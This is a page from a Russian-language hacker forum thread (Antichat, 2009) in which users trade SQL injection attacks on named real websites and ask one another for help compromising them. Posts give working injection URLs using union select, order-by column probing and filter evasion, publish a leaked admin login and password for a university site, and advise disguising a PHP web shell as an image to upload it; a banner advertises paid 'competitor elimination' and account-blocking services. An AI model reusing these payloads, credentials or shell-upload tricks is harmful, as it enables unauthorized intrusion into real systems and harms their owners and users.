FORUMS
MEMBERS
RECENT POSTS
LOG IN
Search Forums
Featured Threads Archive
Recent Posts
Notable Members
Registered Members
Current Visitors
Recent Activity
New Profile Posts
×
Авторизация
Имя пользователя:
Пароль:
Запомнить меня
Привязать к IP
Нет аккаунта?
Регистрация
УСТРАНЕНИЕ КОНКУРЕНТОВ.
БЛОКИРОВКА ДОМЕНОВ,
БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ.
ПРОВЕРЕННЫЙ СЕЛЛЕР.
НОВЫЕ
ТОРГОВАЯ
НОВОСТИ
ЧАТ
loading...
Скрыть
ANTICHAT
>
БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ
>
Уязвимости
Ваши вопросы по уязвимостям.
Поиск по форуму
Расширенный поиск
Страница 605 из 2438
«
Первая
<
105
505
555
595
601
602
603
604
605
606
607
608
609
615
655
705
1105
1605
>
Последняя
»
Опции темы
Поиск в этой теме
Опции просмотра
#
6041
18.03.2009, 11:01
jangle
Познающий
Регистрация: 19.11.2006
Сообщений: 32
С нами:
10249722
Репутация:
5
2 Imperrous
Мне кажется что там вообще нет sql inj. ошибки работы скрипта.
jangle
Посмотреть профиль
Репутация
Отправить личное сообщение для jangle
Найти все сообщения от jangle
Добавить в друзья
#
6042
18.03.2009, 11:36
HIVER
Познающий
Регистрация: 28.10.2008
Сообщений: 43
С нами:
9229334
Репутация:
125
_http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,column_name,3,4,5'/*
HIVER
Посмотреть профиль
Репутация
Отправить личное сообщение для HIVER
Найти все сообщения от HIVER
Добавить в друзья
#
6043
18.03.2009, 12:56
-=Static=-
Участник форума
Регистрация: 12.11.2006
Сообщений: 213
С нами:
10260776
Репутация:
185
Цитата:
Сообщение от
HIVER
_http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,column_name,3,4,5'/*
Тут к information_schema нет прав. Это значит, надо брутить имена талиц и столбцов. Я б SIPTом пробежал, по словарю.
-=Static=-
Посмотреть профиль
Репутация
Отправить личное сообщение для -=Static=-
Посетить домашнюю страницу -=Static=-
Найти все сообщения от -=Static=-
Добавить в друзья
#
6044
18.03.2009, 15:27
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
Привет я только начинаю изучать SQL-inj и по этому прошу вас помочь.
http://www.bookstreet.ru/prod_show.php?object_uid=2'
Почему не идёт? Или не стоило мне браться за MS SQL? (в запросах MS SQL не силён вообще)
Byrger
Посмотреть профиль
Репутация
Отправить личное сообщение для Byrger
Найти все сообщения от Byrger
Добавить в друзья
#
6045
18.03.2009, 16:11
sj666
Новичок
Регистрация: 15.12.2008
Сообщений: 11
С нами:
9159510
Репутация:
6
помогите раскрутить (:
http://www.danieldefo.ru/gallery.html?top=1'
Она слепая?)
sj666
Посмотреть профиль
Репутация
Отправить личное сообщение для sj666
Найти все сообщения от sj666
Добавить в друзья
#
6046
18.03.2009, 16:22
+++AndreyDevil+++
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
С нами:
9140897
Репутация:
90
http://siovizcenter.ucsd.edu/admin/
rnewman:hot98DOG
Как сюда шелл залить? Возможно?
+++AndreyDevil+++
Посмотреть профиль
Репутация
Отправить личное сообщение для +++AndreyDevil+++
Найти все сообщения от +++AndreyDevil+++
Добавить в друзья
#
6047
18.03.2009, 16:32
jangle
Познающий
Регистрация: 19.11.2006
Сообщений: 32
С нами:
10249722
Репутация:
5
Цитата:
Привет я только начинаю изучать SQL-inj и по этому прошу вас помочь.
http://www.bookstreet.ru/prod_show.php?object_uid=2'
Почему не идёт? Или не стоило мне браться за MS SQL? (в запросах MS SQL не силён вообще)
http://www.bookstreet.ru/prod_show.php?object_uid=2+order+by+2--
если больше 2 - то ошибка
Цитата:
The ORDER BY position number 3 is out of range of the number of items in the select list.
а дальше вот что
'=' - режет
'select' -режет (видно из запроса http://www.bookstreet.ru/prod_show.php?object_uid=2+union+select+1,2'-- )
Цитата:
Unclosed quotation mark before the character string '2 union 1,2\' '.
как видно SELECT в запросе убран
тк = режется использовать можно <>
http://www.bookstreet.ru/prod_show.php?object_uid=2+and+1<>@@version--
а дальше читай тут
http://injection.rulezz.ru/MSSQL-ASP-Injection.html
jangle
Посмотреть профиль
Репутация
Отправить личное сообщение для jangle
Найти все сообщения от jangle
Добавить в друзья
#
6048
18.03.2009, 16:32
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
+++AndreyDevil+++
, не смотрел. но попробуй залить как картинку, или побалуйся с расширением файла.
sj666
, какая ж она слепая?))
Цитата:
_http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,column_name,3,4,5'/*
версия бд -
4.0.27-log
. а инф.схема появляеться только в пятой.
Последний раз редактировалось faza02; 18.03.2009 в
16:38
..
faza02
Посмотреть профиль
Репутация
Посетить домашнюю страницу faza02
Найти все сообщения от faza02
Добавить в друзья
#
6049
18.03.2009, 16:36
+++AndreyDevil+++
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
С нами:
9140897
Репутация:
90
faza02,дело в том что он заливает .php но при переходе link становится такого вида http://siovizcenter.ucsd.edu/rq/_getImage.php?libid=223 и предлагает мне скачать шелл )
+++AndreyDevil+++
Посмотреть профиль
Репутация
Отправить личное сообщение для +++AndreyDevil+++
Найти все сообщения от +++AndreyDevil+++
Добавить в друзья
#
6050
18.03.2009, 16:42
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
С нами:
9116712
Репутация:
688
значит ищи в attachements ... я щас просто на работе, был бы дома проверил бы сам все ...
f1ng3r
Посмотреть профиль
Репутация
Отправить личное сообщение для f1ng3r
Найти все сообщения от f1ng3r
Добавить в друзья
Страница 605 из 2438
«
Первая
<
105
505
555
595
601
602
603
604
605
606
607
608
609
615
655
705
1105
1605
>
Последняя
»
«
Предыдущая тема
|
Следующая тема
»
Похожие темы
Тема
Автор
Раздел
Ответов
Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)
PEPSICOLA
Болталка
188
23.05.2010
10:05
Ваши любимые компьютерные игры
PEPSICOLA
Болталка
280
19.08.2009
00:01
Ваши телеги...
F-IFTY
Болталка
13
18.08.2009
18:22
Вопросы по Ipb 2.0
Voodoo_People
Уязвимости CMS / форумов
26
15.02.2005
22:57
Здесь присутствуют: 1
(пользователей: 0 , гостей: 1)
Опции темы
Версия для печати
Отправить по электронной почте
Опции просмотра
Линейный вид
Комбинированный вид
Древовидный вид
Поиск в этой теме
Расширенный поиск
Оценка этой темы
Вы уже оценили эту тему
Быстрый переход
Мой кабинет
Личные сообщения
Подписки
Кто на форуме
Поиск по форуму
Главная страница форума
ИНФО
Мировые новости. Обсуждения.
Статьи
Избранное
РАЗРАБОТКА
Ваши проекты
SЕО - тонкости, методы раскрутки
Услуги, Покупка и Продажа в SEO
Хостинги - Hostings
Хостинг, Dedicated, VDS, Сервера - покупка, продажа
Для Администратора
Apple: Mac, OS X, iOS
AntiDDos - АнтиДДОС
Windows
Linux, Freebsd, *nix
ПРОГРАММИРОВАНИЕ
Общие вопросы программирования
ПО для Web разработчика
PHP
Python
С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby
Реверсинг
ФИНАНСОВЫЕ ЗАДАЧИ/СОЦИАЛЬНЫЕ СЕТИ
Покупка, Продажа, Обмен
Разное - Покупка, продажа, обмен
Услуги, Покупка и Продажа в SEO
Электронные валюты: Обмен, Вывод, Ввод
VPN, Proxy, Socks - Покупка, продажа
Хостинг, Dedicated, VDS, Сервера - Покупка, продажа
Мобильная связь, СМС - Покупка, продажа
Трафик, инсталлы, загрузки - Покупка, продажа
Покупка, продажа, услуги в Соц. Сетях
Партнерки
Freelance - О Работе
Предложения работы, услуг
Социальные сети
Покупка, продажа, услуги в Соц. Сетях
Платежные системы
Электронные валюты: Обмен, Вывод, Ввод
Blockchain, Криптовалюты, смарт-контракты
ЛИЧНЫЕ ФОРУМЫ
Olbanec - Арбитраж трафика
ОФФТОП
Болталка
Forum for discussion of ANTICHAT
Video.Antichat
Комментарии к видео
Архив
ICQ - Покупка, продажа
Home
Contact Us
Help
Terms and Rules
Privacy Policy
ANTICHAT ™ © 2001- Antichat Kft.